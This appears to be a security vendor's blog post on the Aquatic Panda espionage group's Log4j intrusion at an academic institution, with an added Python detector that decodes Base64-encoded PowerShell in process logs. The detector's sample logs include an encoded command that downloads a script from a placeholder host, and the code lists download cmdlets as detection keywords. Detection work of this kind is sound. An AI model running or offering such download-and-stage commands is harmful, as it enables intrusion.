Aquatic Panda’s security breaches help the group collect intelligence, conduct espionage, and harvest credentials. This adversary poses a significant threat, which researchers in the private sector are working to disrupt. Learn who Aquatic Panda targets and assess whether your organization should upgrade its systems to match these attackers’ capabilities.

Aquatic Panda targets

Aquatic Panda tends to focus on universities and collegiate institutions. Why are hackers focused on these groups? Academic institutions often house valuable data, and hackers know that this data is often quite poorly secured.

Presently, the Aquatic Panda advanced persistent threat (APT) group is leveraging the Log4j vulnerabilities to access proprietary information owned by academic institutions.


What we know

The Aquatic Panda group first appeared online in 2012. According to researchers, Aquatic Panda operators primarily aim to collect intelligence and to engage in espionage. The group’s more specific objectives remain unknown.

Up until this point, Aquatic Panda has primarily targeted telecommunications firms, technology firms, and government entities. Now, educational institutions have entered the mix. Operators rely extensively on Cobalt Strike. Previous tools used in operations also include Gh0st RAT, Poison Ivy, and Torn RAT.

Why it matters

Aquatic Panda is state-sponsored and uses strategies that allow persistence in environments. This sets the stage for continuous theft of valuable data. It also enables the threat actors to spend days, weeks or months mapping out vulnerabilities and planning for a more lucrative and disruptive attack. Attack clean-up isn’t easy and can cost organizations millions of dollars.

Log4j details

Researchers have recently observed suspicious activity stemming from a specific process on a vulnerable VMware Horizon instance. The network belonged to a large academic institution. The activity ultimately resulted in an active intrusion.

After tracking the APT actor’s operations and examining available telemetry, researchers disclosed that a modified version of the Log4j exploit was likely used during the operation.

Technical insights

Researchers report that Aquatic Panda members leveraged a public GitHub project starting on December 13th of this year to gain access to the vulnerable instance of VMware Horizon. The Aquatic Panda group continued reconnaissance from the host while using native OS binaries to explore existing privilege levels, system details and domain information.

As researchers continued to trace Aquatic Panda’s behaviors, they observed the use of a Base64-encoded command, run via PowerShell, to obtain malware from toolkits. While the attack unfolded, experts provided regular updates to the victim organization. The target implemented its incident response protocol as quickly as possible. Eventually, patching of the vulnerable application prevented further intruder activity.
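As an added defender-side illustration (not code from the report or from any vendor named here), the Python below scans constructed process-creation records for the Base64-encoded PowerShell pattern described above, decodes the UTF-16LE payload so an analyst can read it, and raises the severity when the decoded command fetches further tooling. The log layout, parent process name and URL are placeholders.

```python
import base64
import binascii
import re
from typing import Optional
# PowerShell accepts abbreviations of -EncodedCommand (-e, -ec, -en, -enc) and
# matches switches case-insensitively, so the detector must be equally loose.
ENC_SWITCH = re.compile(r"(?<!\S)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                        re.IGNORECASE)
# Cmdlets and aliases typical of an encoded command used to fetch a second
# stage; their presence promotes a finding from "review" to "alert".
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                    "invoke-expression", "iex ", "net.webclient")


def encode_ps(script: str) -> str:
    """Encode as -EncodedCommand expects: UTF-16LE text, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ps(blob: str) -> Optional[str]:
    """Reverse of encode_ps; None when the blob is not a valid encoded command."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def scan_log_lines(lines):
    """One finding per PowerShell launch that carries an encoded command."""
    findings = []
    for line in lines:
        match = ENC_SWITCH.search(line) if "powershell" in line.lower() else None
        if not match:
            continue
        decoded = decode_ps(match.group(1))
        hit = decoded is not None and any(m in decoded.lower() for m in DOWNLOAD_MARKERS)
        findings.append({"line": line, "decoded": decoded,
                         "severity": "alert" if hit else "review"})
    return findings

# Constructed sample process-creation records (hypothetical, not from the report);
# the third mimics a download-and-stage command, the fourth carries an undecodable blob.
SAMPLE_LOGS = [
    "2021-12-14T03:12:01Z host1 parent-placeholder.exe -> powershell.exe -NoProfile -Command Get-Date",
    "2021-12-14T03:12:09Z host1 parent-placeholder.exe -> powershell.exe -enc "
    + encode_ps("Get-Process | Select-Object -First 3"),
    "2021-12-14T03:12:40Z host1 parent-placeholder.exe -> powershell.exe -NoP -W Hidden -EncodedCommand "
    + encode_ps("Invoke-WebRequest 'http://placeholder.invalid/tool.ps1' -OutFile C:\\Users\\Public\\tool.ps1"),
    "2021-12-14T03:13:02Z host1 parent-placeholder.exe -> powershell.exe -ec QUJD",
]
```

An undecodable blob after an encoded-command switch is still surfaced for review rather than dropped, since a malformed or deliberately mangled argument is itself worth a look.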

In conclusion

Across the world, a series of threat actors are exploiting the Log4j vulnerabilities for criminal gain. At least a handful of experts expect to see continued threat actor use of Log4j until all organizations apply comprehensive mitigations.

For its part, Apache has just issued another security update for the Log4j logging library. As of Tuesday, the latest version of Log4j available for install on systems running Java 8 is 2.17.1. This release addresses the fifth vulnerability discovered since December 9th. Given all of the attention on this library, this may or may not be the final update pertaining to Log4j vulnerabilities.

To learn more about managing cyber risk in a changing world, please join us at the premiere cyber security event of the year – CPX 360 2022. Register here.